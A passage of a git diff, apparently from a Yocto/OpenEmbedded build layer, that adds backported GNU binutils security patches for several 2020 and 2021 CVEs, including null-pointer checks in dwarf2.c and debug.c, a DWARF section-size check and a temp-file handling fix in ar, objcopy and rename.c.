+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=7ecb51549ab1ec22aba5aaf34b70323cf0b8509a]
+CVE: CVE-2020-16592
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/peXXigen.c | 20 ++++++++++----------
+ 1 files changed, 10 insertions(+), 10 deletions(-)
+
+diff --git a/bfd/peXXigen.c b/bfd/peXXigen.c
+index b9eeb775d9b..8aa5914acd9 100644
+--- a/bfd/peXXigen.c
++++ b/bfd/peXXigen.c
+@@ -177,25 +177,25 @@ _bfd_XXi_swap_sym_in (bfd * abfd, void * ext1, void * in1)
+ int unused_section_number = 0;
+ asection *sec;
+ flagword flags;
++ size_t name_len;
++ char *sec_name;
+
+ for (sec = abfd->sections; sec; sec = sec->next)
+ if (unused_section_number <= sec->target_index)
+ unused_section_number = sec->target_index + 1;
+
+- if (name == namebuf)
++ name_len = strlen (name) + 1;
++ sec_name = bfd_alloc (abfd, name_len);
++ if (sec_name == NULL)
+ {
+- name = (const char *) bfd_alloc (abfd, strlen (namebuf) + 1);
+- if (name == NULL)
+- {
+- _bfd_error_handler (_("%pB: out of memory creating name for empty section"),
+- abfd);
+- return;
+- }
+- strcpy ((char *) name, namebuf);
++ _bfd_error_handler (_("%pB: out of memory creating name "
++ "for empty section"), abfd);
++ return;
+ }
++ memcpy (sec_name, name, name_len);
+
+ flags = SEC_HAS_CONTENTS | SEC_ALLOC | SEC_DATA | SEC_LOAD;
+- sec = bfd_make_section_anyway_with_flags (abfd, name, flags);
++ sec = bfd_make_section_anyway_with_flags (abfd, sec_name, flags);
+ if (sec == NULL)
+ {
+ _bfd_error_handler (_("%pB: unable to create fake empty section"),
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
new file mode 100644
index 0000000000..c7c7829261
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
@@ -0,0 +1,204 @@
+From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 16 Apr 2020 17:49:38 +0930
+Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols
+
+ PR 25827
+ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
+ strdup(0).
+
+Upstream-Status: Backport
+https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729
+CVE: CVE-2020-16593
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: git/bfd/dwarf2.c
+===================================================================
+--- git.orig/bfd/dwarf2.c
++++ git/bfd/dwarf2.c
+@@ -295,12 +295,12 @@ struct comp_unit
+ /* This data structure holds the information of an abbrev. */
+ struct abbrev_info
+ {
+- unsigned int number; /* Number identifying abbrev. */
+- enum dwarf_tag tag; /* DWARF tag. */
+- int has_children; /* Boolean. */
+- unsigned int num_attrs; /* Number of attributes. */
+- struct attr_abbrev *attrs; /* An array of attribute descriptions. */
+- struct abbrev_info *next; /* Next in chain. */
++ unsigned int number; /* Number identifying abbrev. */
++ enum dwarf_tag tag; /* DWARF tag. */
++ bfd_boolean has_children; /* TRUE if the abbrev has children. */
++ unsigned int num_attrs; /* Number of attributes. */
++ struct attr_abbrev * attrs; /* An array of attribute descriptions. */
++ struct abbrev_info * next; /* Next in chain. */
+ };
+
+ struct attr_abbrev
+@@ -1487,6 +1487,8 @@ struct varinfo
+ {
+ /* Pointer to previous variable in list of all variables */
+ struct varinfo *prev_var;
++ /* The offset of the varinfo from the start of the unit. */
++ bfd_uint64_t unit_offset;
+ /* Source location file name */
+ char *file;
+ /* Source location line number */
+@@ -1497,7 +1499,7 @@ struct varinfo
+ /* Where the symbol is defined */
+ asection *sec;
+ /* Is this a stack variable? */
+- unsigned int stack: 1;
++ bfd_boolean stack;
+ };
+
+ /* Return TRUE if NEW_LINE should sort after LINE. */
+@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct
+ struct varinfo* each;
+
+ for (each = unit->variable_table; each; each = each->prev_var)
+- if (each->stack == 0
++ if (! each->stack
+ && each->file != NULL
+ && each->name != NULL
+ && each->addr == addr
+@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit,
+ return TRUE;
+ }
+
++static struct varinfo *
++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table)
++{
++ while (table)
++ {
++ if (table->unit_offset == offset)
++ return table;
++ table = table->prev_var;
++ }
++
++ return NULL;
++}
++
++
+ /* DWARF2 Compilation unit functions. */
+
+ /* Scan over each die in a comp. unit looking for functions to add
+@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit
+ bfd_vma low_pc = 0;
+ bfd_vma high_pc = 0;
+ bfd_boolean high_pc_relative = FALSE;
++ bfd_uint64_t current_offset;
++
++ current_offset = info_ptr - unit->info_ptr_unit;
+
+ /* PR 17512: file: 9f405d9d. */
+ if (info_ptr >= info_ptr_end)
+@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit
+ goto fail;
+ }
+
+- var = NULL;
+ if (abbrev->tag == DW_TAG_subprogram
+ || abbrev->tag == DW_TAG_entry_point
+ || abbrev->tag == DW_TAG_inlined_subroutine)
+ {
+ bfd_size_type amt = sizeof (struct funcinfo);
++
++ var = NULL;
+ func = (struct funcinfo *) bfd_zalloc (abfd, amt);
+ if (func == NULL)
+ goto fail;
+@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit
+ if (var == NULL)
+ goto fail;
+ var->tag = abbrev->tag;
+- var->stack = 1;
++ var->stack = TRUE;
+ var->prev_var = unit->variable_table;
+ unit->variable_table = var;
++ var->unit_offset = current_offset;
+ /* PR 18205: Missing debug information can cause this
+ var to be attached to an already cached unit. */
+ }
+-
++ else
++ var = NULL;
+ /* No inline function in scope at this nesting level. */
+ nested_funcs[nesting_level].func = 0;
+ }
+@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit
+ {
+ switch (attr.name)
+ {
++ case DW_AT_specification:
++ if (attr.u.val)
++ {
++ struct varinfo * spec_var;
++
++ spec_var = lookup_var_by_offset (attr.u.val,
++ unit->variable_table);
++ if (spec_var == NULL)
++ {
++ _bfd_error_handler (_("DWARF error: could not find "
++ "variable specification "
++ "at offset %lx"),
++ (unsigned long) attr.u.val);
++ break;
++ }
++
++ if (var->name == NULL)
++ var->name = spec_var->name;
++ if (var->file == NULL && spec_var->file != NULL)
++ var->file = strdup (spec_var->file);
++ if (var->line == 0)
++ var->line = spec_var->line;
++ if (var->sec == NULL)
++ var->sec = spec_var->sec;
++ }
++ break;
++
+ case DW_AT_name:
+ if (is_str_attr (attr.form))
+ var->name = attr.u.str;
+@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit
+
+ case DW_AT_external:
+ if (attr.u.val != 0)
+- var->stack = 0;
++ var->stack = FALSE;
+ break;
+
+ case DW_AT_location:
+@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit
+ if (attr.u.blk->data != NULL
+ && *attr.u.blk->data == DW_OP_addr)
+ {
+- var->stack = 0;
++ var->stack = FALSE;
+
+ /* Verify that DW_OP_addr is the only opcode in the
+ location, in which case the block size will be 1
+@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug
+ each_var = each_var->prev_var)
+ {
+ /* Skip stack vars and vars with no files or names. */
+- if (each_var->stack == 0
++ if (! each_var->stack
+ && each_var->file != NULL
+ && each_var->name != NULL)
+ /* There is no need to copy name string into hash table as
+Index: git/bfd/ChangeLog
+===================================================================
+--- git.orig/bfd/ChangeLog
++++ git/bfd/ChangeLog
+@@ -1,3 +1,9 @@
++2020-04-16 Alan Modra <amodra@gmail.com>
++
++ PR 25827
++ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
++ strdup(0).
++
+ 2021-05-03 Alan Modra <amodra@gmail.com>
+
+ PR 27755
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
new file mode 100644
index 0000000000..52bd925c97
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
@@ -0,0 +1,32 @@
+From ca3f923f82a079dcf441419f4a50a50f8b4b33c2 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Apr 2020 10:38:16 +0930
+Subject: [PATCH] PR25840, Null pointer dereference in objdump
+
+ PR 25840
+ * debug.c (debug_class_type_samep): Don't segfault on NULL type.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=ca3f923f82a079dcf441419f4a50a50f8b4b33c2]
+CVE: CVE-2020-16598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ binutils/debug.c | 2 ++
+ 1 files changed, 2 insertions(+)
+
+diff --git a/binutils/debug.c b/binutils/debug.c
+index 022fa4edffb..5470e155edc 100644
+--- a/binutils/debug.c
++++ b/binutils/debug.c
+@@ -3277,6 +3277,8 @@ debug_class_type_samep (struct debug_handle *info, struct debug_type_s *t1,
+ names, since that sometimes fails in the presence of
+ typedefs and we really don't care. */
+ if (strcmp (f1->name, f2->name) != 0
++ || f1->type == NULL
++ || f2->type == NULL
+ || ! debug_type_samep (info,
+ debug_get_real_type ((void *) info,
+ f1->type, NULL),
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
new file mode 100644
index 0000000000..423814f98d
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
@@ -0,0 +1,572 @@
+From d3edaa91d4cf7202ec14342410194841e2f67f12 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 26 Feb 2021 11:30:32 +1030
+Subject: [PATCH v2] Reinstate various pieces backed out from smart_rename changes
+
+In the interests of a stable release various last minute smart_rename
+patches were backed out of the 2.36 branch. The main reason to
+reinstate some of those backed out changes here is to make necessary
+followup fixes to commit 8e03235147a9 simple cherry-picks from
+mainline. A secondary reason is that ar -M support isn't fixed for
+pr26945 without this patch.
+
+ PR 26945
+ * ar.c: Don't include libbfd.h.
+ (write_archive): Replace xmalloc+strcpy with xstrdup.
+ * arsup.c (temp_name, real_ofd): New static variables.
+ (ar_open): Use make_tempname and bfd_fdopenw.
+ (ar_save): Adjust to suit ar_open changes.
+ * objcopy.c: Don't include libbfd.h.
+ * rename.c: Rename and reorder variables.
+
+(cherry picked from commit 95b91a043aeaeb546d2fea556d84a2de1e917770)
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=d3edaa91d4cf7202ec14342410194841e2f67f12]
+CVE: CVE-2021-20197
+Signed-off-by: Vinay Kumar <vinay.m.engg@gmail.com>
+---
+ bfd/bfd-in2.h | 2 +
+ bfd/opncls.c | 33 ++++++++++
+ binutils/ar.c | 15 +++--
+ binutils/arsup.c | 37 ++++++++----
+ binutils/bucomm.c | 4 +-
+ binutils/bucomm.h | 5 +-
+ binutils/objcopy.c | 37 +++++++-----
+ binutils/rename.c | 148 +++++++++++----------------------------------
+ 8 files changed, 133 insertions(+), 148 deletions(-)
+
+diff --git a/bfd/bfd-in2.h b/bfd/bfd-in2.h
+index 2e453c50c18..e53f54a8ab7 100644
+--- a/bfd/bfd-in2.h
++++ b/bfd/bfd-in2.h
+@@ -588,6 +588,8 @@ bfd *bfd_openr (const char *filename, const char *target);
+
+ bfd *bfd_fdopenr (const char *filename, const char *target, int fd);
+
++bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
+ bfd *bfd_openstreamr (const char * filename, const char * target,
+ void * stream);
+
+diff --git a/bfd/opncls.c b/bfd/opncls.c
+index a03ad51c8fa..f9da97ed710 100644
+--- a/bfd/opncls.c
++++ b/bfd/opncls.c
+@@ -370,6 +370,39 @@ bfd_fdopenr (const char *filename, const char *target, int fd)
+ return bfd_fopen (filename, target, mode, fd);
+ }
+
++/*
++FUNCTION
++ bfd_fdopenw
++
++SYNOPSIS
++ bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
++DESCRIPTION
++ <<bfd_fdopenw>> is exactly like <<bfd_fdopenr>> with the exception that
++ the resulting BFD is suitable for output.
++*/
++
++bfd *
++bfd_fdopenw (const char *filename, const char *target, int fd)
++{
++ bfd *out = bfd_fdopenr (filename, target, fd);
++
++ if (out != NULL)
++ {
++ if (!bfd_write_p (out))
++ {
++ close (fd);
++ _bfd_delete_bfd (out);
++ out = NULL;
++ bfd_set_error (bfd_error_invalid_operation);
++ }
++ else
++ out->direction = write_direction;
++ }
++
++ return out;
++}
++
+ /*
+ FUNCTION
+ bfd_openstreamr
+diff --git a/binutils/ar.c b/binutils/ar.c
+index 1057db9980e..c33a11e0d70 100644
+--- a/binutils/ar.c
++++ b/binutils/ar.c
+@@ -1195,20 +1195,23 @@ write_archive (bfd *iarch)
+ bfd *obfd;
+ char *old_name, *new_name;
+ bfd *contents_head = iarch->archive_next;
++ int ofd = -1;
+
+- old_name = (char *) xmalloc (strlen (bfd_get_filename (iarch)) + 1);
+- strcpy (old_name, bfd_get_filename (iarch));
+- new_name = make_tempname (old_name);
++ old_name = xstrdup (bfd_get_filename (iarch));
++ new_name = make_tempname (old_name, &ofd);
+
+ if (new_name == NULL)
+ bfd_fatal (_("could not create temporary file whilst writing archive"));
+
+ output_filename = new_name;
+
+- obfd = bfd_openw (new_name, bfd_get_target (iarch));
++ obfd = bfd_fdopenw (new_name, bfd_get_target (iarch), ofd);
+
+ if (obfd == NULL)
+- bfd_fatal (old_name);
++ {
++ close (ofd);
++ bfd_fatal (old_name);
++ }
+
+ output_bfd = obfd;
+
+@@ -1246,7 +1249,7 @@ write_archive (bfd *iarch)
+ /* We don't care if this fails; we might be creating the archive. */
+ bfd_close (iarch);
+
+- if (smart_rename (new_name, old_name, 0) != 0)
++ if (smart_rename (new_name, old_name, NULL) != 0)
+ xexit (1);
+ free (old_name);
+ free (new_name);
+diff --git a/binutils/arsup.c b/binutils/arsup.c
+index 00967c972cd..b8ae4f7ec1a 100644
+--- a/binutils/arsup.c
++++ b/binutils/arsup.c
+@@ -42,6 +42,8 @@ extern int deterministic;
+
+ static bfd *obfd;
+ static char *real_name;
++static char *temp_name;
++static int real_ofd;
+ static FILE *outfile;
+
+ static void
+@@ -149,27 +151,24 @@ maybequit (void)
+ void
+ ar_open (char *name, int t)
+ {
+- char *tname;
+- const char *bname = lbasename (name);
+- real_name = name;
++ real_name = xstrdup (name);
++ temp_name = make_tempname (real_name, &real_ofd);
+
+- /* Prepend tmp- to the beginning, to avoid file-name clashes after
+- truncation on filesystems with limited namespaces (DOS). */
+- if (asprintf (&tname, "%.*stmp-%s", (int) (bname - name), name, bname) == -1)
++ if (temp_name == NULL)
+ {
+- fprintf (stderr, _("%s: Can't allocate memory for temp name (%s)\n"),
++ fprintf (stderr, _("%s: Can't open temporary file (%s)\n"),
+ program_name, strerror(errno));
+ maybequit ();
+ return;
+ }
+
+- obfd = bfd_openw (tname, NULL);
++ obfd = bfd_fdopenw (temp_name, NULL, real_ofd);
+
+ if (!obfd)
+ {
+ fprintf (stderr,
+ _("%s: Can't open output archive %s\n"),
+- program_name, tname);
++ program_name, temp_name);
+
+ maybequit ();
+ }
+@@ -344,16 +343,30 @@ ar_save (void)
+ }
+ else
+ {
+- char *ofilename = xstrdup (bfd_get_filename (obfd));
++ struct stat target_stat;
+
+ if (deterministic > 0)
+ obfd->flags |= BFD_DETERMINISTIC_OUTPUT;
+
+ bfd_close (obfd);
+
+- smart_rename (ofilename, real_name, 0);
++ if (stat (real_name, &target_stat) != 0)
++ {
++ /* The temp file created in ar_open has mode 0600 as per mkstemp.
++ Create the real empty output file here so smart_rename will
++ update the mode according to the process umask. */
++ obfd = bfd_openw (real_name, NULL);
++ if (obfd != NULL)
++ {
++ bfd_set_format (obfd, bfd_archive);
++ bfd_close (obfd);
++ }
++ }
++
++ smart_rename (temp_name, real_name, NULL);
+ obfd = 0;
+- free (ofilename);
++ free (temp_name);
++ free (real_name);
+ }
+ }
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index 9e6a02843e6..53244201f89 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -532,7 +532,7 @@ template_in_dir (const char *path)
+ as FILENAME. */
+
+ char *
+-make_tempname (const char *filename)
++make_tempname (const char *filename, int *ofd)
+ {
+ char *tmpname = template_in_dir (filename);
+ int fd;
+@@ -550,7 +550,7 @@ make_tempname (const char *filename)
+ free (tmpname);
+ return NULL;
+ }
+- close (fd);
++ *ofd = fd;
+ return tmpname;
+ }
+
+diff --git a/binutils/bucomm.h b/binutils/bucomm.h
+index d8318343f78..2b164e0af68 100644
+--- a/binutils/bucomm.h
++++ b/binutils/bucomm.h
+@@ -51,7 +51,7 @@ int display_info (void);
+
+ void print_arelt_descr (FILE *, bfd *, bfd_boolean, bfd_boolean);
+
+-char *make_tempname (const char *);
++char *make_tempname (const char *, int *);
+ char *make_tempdir (const char *);
+
+ bfd_vma parse_vma (const char *, const char *);
+@@ -71,7 +71,8 @@ extern void print_version (const char *);
+ /* In rename.c. */
+ extern void set_times (const char *, const struct stat *);
+
+-extern int smart_rename (const char *, const char *, int);
++extern int smart_rename (const char *, const char *, struct stat *);
++
+
+ /* In libiberty. */
+ void *xmalloc (size_t);
+diff --git a/binutils/objcopy.c b/binutils/objcopy.c
+index 212e25144e6..5ccbd926610 100644
+--- a/binutils/objcopy.c
++++ b/binutils/objcopy.c
+@@ -3682,7 +3682,7 @@ set_long_section_mode (bfd *output_bfd, bfd *input_bfd, enum long_section_name_h
+ /* The top-level control. */
+
+ static void
+-copy_file (const char *input_filename, const char *output_filename,
++copy_file (const char *input_filename, const char *output_filename, int ofd,
+ const char *input_target, const char *output_target,
+ const bfd_arch_info_type *input_arch)
+ {
+@@ -3757,9 +3757,14 @@ copy_file (const char *input_filename, const char *output_filename,
+ else
+ force_output_target = TRUE;
+
+- obfd = bfd_openw (output_filename, output_target);
++ if (ofd >= 0)
++ obfd = bfd_fdopenw (output_filename, output_target, ofd);
++ else
++ obfd = bfd_openw (output_filename, output_target);
++
+ if (obfd == NULL)
+ {
++ close (ofd);
+ bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+ status = 1;
+ return;
+@@ -3787,13 +3792,19 @@ copy_file (const char *input_filename, const char *output_filename,
+ if (output_target == NULL)
+ output_target = bfd_get_target (ibfd);
+
+- obfd = bfd_openw (output_filename, output_target);
++ if (ofd >= 0)
++ obfd = bfd_fdopenw (output_filename, output_target, ofd);
++ else
++ obfd = bfd_openw (output_filename, output_target);
++
+ if (obfd == NULL)
+ {
++ close (ofd);
+ bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+ status = 1;
+ return;
+ }
++
+ /* This is a no-op on non-Coff targets. */
+ set_long_section_mode (obfd, ibfd, long_section_names);
+
+@@ -4746,6 +4757,7 @@ strip_main (int argc, char *argv[])
+ int hold_status = status;
+ struct stat statbuf;
+ char *tmpname;
++ int tmpfd = -1;
+
+ if (get_file_size (argv[i]) < 1)
+ {
+@@ -4760,7 +4772,7 @@ strip_main (int argc, char *argv[])
+
+ if (output_file == NULL
+ || filename_cmp (argv[i], output_file) == 0)
+- tmpname = make_tempname (argv[i]);
++ tmpname = make_tempname (argv[i], &tmpfd);
+ else
+ tmpname = output_file;
+
+@@ -4773,15 +4785,13 @@ strip_main (int argc, char *argv[])
+ }
+
+ status = 0;
+- copy_file (argv[i], tmpname, input_target, output_target, NULL);
++ copy_file (argv[i], tmpname, tmpfd, input_target, output_target, NULL);
+ if (status == 0)
+ {
+- if (preserve_dates)
+- set_times (tmpname, &statbuf);
+ if (output_file != tmpname)
+ status = (smart_rename (tmpname,
+ output_file ? output_file : argv[i],
+- preserve_dates) != 0);
++ preserve_dates ? &statbuf : NULL) != 0);
+ if (status == 0)
+ status = hold_status;
+ }
+@@ -4993,7 +5003,7 @@ copy_main (int argc, char *argv[])
+ bfd_boolean formats_info = FALSE;
+ bfd_boolean use_globalize = FALSE;
+ bfd_boolean use_keep_global = FALSE;
+- int c;
++ int c, tmpfd = -1;
+ struct stat statbuf;
+ const bfd_arch_info_type *input_arch = NULL;
+
+@@ -5839,7 +5849,7 @@ copy_main (int argc, char *argv[])
+ are the same, then create a temp and rename the result into the input. */
+ if (output_filename == NULL
+ || filename_cmp (input_filename, output_filename) == 0)
+- tmpname = make_tempname (input_filename);
++ tmpname = make_tempname (input_filename, &tmpfd);
+ else
+ tmpname = output_filename;
+
+@@ -5847,14 +5857,13 @@ copy_main (int argc, char *argv[])
+ fatal (_("warning: could not create temporary file whilst copying '%s', (error: %s)"),
+ input_filename, strerror (errno));
+
+- copy_file (input_filename, tmpname, input_target, output_target, input_arch);
++ copy_file (input_filename, tmpname, tmpfd, input_target, output_target,
++ input_arch);
+ if (status == 0)
+ {
+- if (preserve_dates)
+- set_times (tmpname, &statbuf);
+ if (tmpname != output_filename)
+ status = (smart_rename (tmpname, input_filename,
+- preserve_dates) != 0);
++ preserve_dates ? &statbuf : NULL) != 0);
+ }
+ else
+ unlink_if_ordinary (tmpname);
+diff --git a/binutils/rename.c b/binutils/rename.c
+index bf3b68d0462..07d44d0f314 100644
+--- a/binutils/rename.c
++++ b/binutils/rename.c
+@@ -24,14 +24,9 @@
+
+ #ifdef HAVE_GOOD_UTIME_H
+ #include <utime.h>
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifdef HAVE_UTIMES
++#elif defined HAVE_UTIMES
+ #include <sys/time.h>
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+-
+-#if ! defined (_WIN32) || defined (__CYGWIN32__)
+-static int simple_copy (const char *, const char *);
++#endif
+
+ /* The number of bytes to copy at once. */
+ #define COPY_BUF 8192
+@@ -82,7 +77,6 @@ simple_copy (const char *from, const char *to)
+ }
+ return 0;
+ }
+-#endif /* __CYGWIN32__ or not _WIN32 */
+
+ /* Set the times of the file DESTINATION to be the same as those in
+ STATBUF. */
+@@ -91,122 +85,52 @@ void
+ set_times (const char *destination, const struct stat *statbuf)
+ {
+ int result;
+-
+- {
+ #ifdef HAVE_GOOD_UTIME_H
+- struct utimbuf tb;
+-
+- tb.actime = statbuf->st_atime;
+- tb.modtime = statbuf->st_mtime;
+- result = utime (destination, &tb);
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifndef HAVE_UTIMES
+- long tb[2];
+-
+- tb[0] = statbuf->st_atime;
+- tb[1] = statbuf->st_mtime;
+- result = utime (destination, tb);
+-#else /* HAVE_UTIMES */
+- struct timeval tv[2];
+-
+- tv[0].tv_sec = statbuf->st_atime;
+- tv[0].tv_usec = 0;
+- tv[1].tv_sec = statbuf->st_mtime;
+- tv[1].tv_usec = 0;
+- result = utimes (destination, tv);
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+- }
++ struct utimbuf tb;
++
++ tb.actime = statbuf->st_atime;
++ tb.modtime = statbuf->st_mtime;
++ result = utime (destination, &tb);
++#elif defined HAVE_UTIMES
++ struct timeval tv[2];
++
++ tv[0].tv_sec = statbuf->st_atime;
++ tv[0].tv_usec = 0;
++ tv[1].tv_sec = statbuf->st_mtime;
++ tv[1].tv_usec = 0;
++ result = utimes (destination, tv);
++#else
++ long tb[2];
++
++ tb[0] = statbuf->st_atime;
++ tb[1] = statbuf->st_mtime;
++ result = utime (destination, tb);
++#endif
+
+ if (result != 0)
+ non_fatal (_("%s: cannot set time: %s"), destination, strerror (errno));
+ }
+
+-#ifndef S_ISLNK
+-#ifdef S_IFLNK
+-#define S_ISLNK(m) (((m) & S_IFMT) == S_IFLNK)
+-#else
+-#define S_ISLNK(m) 0
+-#define lstat stat
+-#endif
+-#endif
+-
+-/* Rename FROM to TO, copying if TO is a link.
+- Return 0 if ok, -1 if error. */
++/* Copy FROM to TO. TARGET_STAT has the file status that, if non-NULL,
++ is used to fix up timestamps. Return 0 if ok, -1 if error.
++ At one time this function renamed files, but file permissions are
++ tricky to update given the number of different schemes used by
++ various systems. So now we just copy. */
+
+ int
+-smart_rename (const char *from, const char *to, int preserve_dates ATTRIBUTE_UNUSED)
++smart_rename (const char *from, const char *to,
++ struct stat *target_stat)
+ {
+- bfd_boolean exists;
+- struct stat s;
+- int ret = 0;
+-
+- exists = lstat (to, &s) == 0;
+-
+-#if defined (_WIN32) && !defined (__CYGWIN32__)
+- /* Win32, unlike unix, will not erase `to' in `rename(from, to)' but
+- fail instead. Also, chown is not present. */
++ int ret;
+
+- if (exists)
+- remove (to);
+-
+- ret = rename (from, to);
++ ret = simple_copy (from, to);
+ if (ret != 0)
+- {
+- /* We have to clean up here. */
+- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+- unlink (from);
+- }
+-#else
+- /* Use rename only if TO is not a symbolic link and has
+- only one hard link, and we have permission to write to it. */
+- if (! exists
+- || (!S_ISLNK (s.st_mode)
+- && S_ISREG (s.st_mode)
+- && (s.st_mode & S_IWUSR)
+- && s.st_nlink == 1)
+- )
+- {
+- ret = rename (from, to);
+- if (ret == 0)
+- {
+- if (exists)
+- {
+- /* Try to preserve the permission bits and ownership of
+- TO. First get the mode right except for the setuid
+- bit. Then change the ownership. Then fix the setuid
+- bit. We do the chmod before the chown because if the
+- chown succeeds, and we are a normal user, we won't be
+- able to do the chmod afterward. We don't bother to
+- fix the setuid bit first because that might introduce
+- a fleeting security problem, and because the chown
+- will clear the setuid bit anyhow. We only fix the
+- setuid bit if the chown succeeds, because we don't
+- want to introduce an unexpected setuid file owned by
+- the user running objcopy. */
+- chmod (to, s.st_mode & 0777);
+- if (chown (to, s.st_uid, s.st_gid) >= 0)
+- chmod (to, s.st_mode & 07777);
+- }
+- }
+- else
+- {
+- /* We have to clean up here. */
+- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+- unlink (from);
+- }
+- }
+- else
+- {
+- ret = simple_copy (from, to);
+- if (ret != 0)
+- non_fatal (_("unable to copy file '%s'; reason: %s"), to, strerror (errno));
++ non_fatal (_("unable to copy file '%s'; reason: %s"),
++ to, strerror (errno));
+
+- if (preserve_dates)
+- set_times (to, &s);
+- unlink (from);
+- }
+-#endif /* _WIN32 && !__CYGWIN32__ */
++ if (target_stat != NULL)
++ set_times (to, target_stat);
++ unlink (from);
+
+ return ret;
+ }
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
new file mode 100644
index 0000000000..1502d03f43
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
@@ -0,0 +1,83 @@
+From 647cebce12a6b0a26960220caff96ff38978cf24 Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Thu, 26 Nov 2020 17:08:33 +0000
+Subject: [PATCH] Prevent a memory allocation failure when parsing corrupt
+ DWARF debug sections.
+
+ PR 26946
+ * dwarf2.c (read_section): Check for debug sections with excessive
+ sizes.
+
+
+Upstream-Status: Backport [
+https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=647cebce12a6b0a26960220caff96ff38978cf24
+]
+CVE: CVE-2021-3487
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/dwarf2.c | 25 +++++++++++++++++++------
+ 1 files changed, 25 insertions(+), 6 deletions(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index 977bf43a6a1..8bbfc81d3e7 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -531,22 +531,24 @@ read_section (bfd * abfd,
+ bfd_byte ** section_buffer,
+ bfd_size_type * section_size)
+ {
+- asection *msec;
+ const char *section_name = sec->uncompressed_name;
+ bfd_byte *contents = *section_buffer;
+- bfd_size_type amt;
+
+ /* The section may have already been read. */
+ if (contents == NULL)
+ {
++ bfd_size_type amt;
++ asection *msec;
++ ufile_ptr filesize;
++
+ msec = bfd_get_section_by_name (abfd, section_name);
+- if (! msec)
++ if (msec == NULL)
+ {
+ section_name = sec->compressed_name;
+ if (section_name != NULL)
+ msec = bfd_get_section_by_name (abfd, section_name);
+ }
+- if (! msec)
++ if (msec == NULL)
+ {
+ _bfd_error_handler (_("DWARF error: can't find %s section."),
+ sec->uncompressed_name);
+@@ -554,12 +556,23 @@ read_section (bfd * abfd,
+ return FALSE;
+ }
+
+- *section_size = msec->rawsize ? msec->rawsize : msec->size;
++ amt = bfd_get_section_limit_octets (abfd, msec);
++ filesize = bfd_get_file_size (abfd);
++ if (amt >= filesize)
++ {
++ /* PR 26946 */
++ _bfd_error_handler (_("DWARF error: section %s is larger than its filesize! (0x%lx vs 0x%lx)"),
++ section_name, (long) amt, (long) filesize);
++ bfd_set_error (bfd_error_bad_value);
++ return FALSE;
++ }
++ *section_size = amt;
+ /* Paranoia - alloc one extra so that we can make sure a string
+ section is NUL terminated. */
+- amt = *section_size + 1;
++ amt += 1;
+ if (amt == 0)
+ {
++ /* Paranoia - this should never happen. */
+ bfd_set_error (bfd_error_no_memory);
+ return FALSE;
+ }
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
new file mode 100644
index 0000000000..5f56dd7696
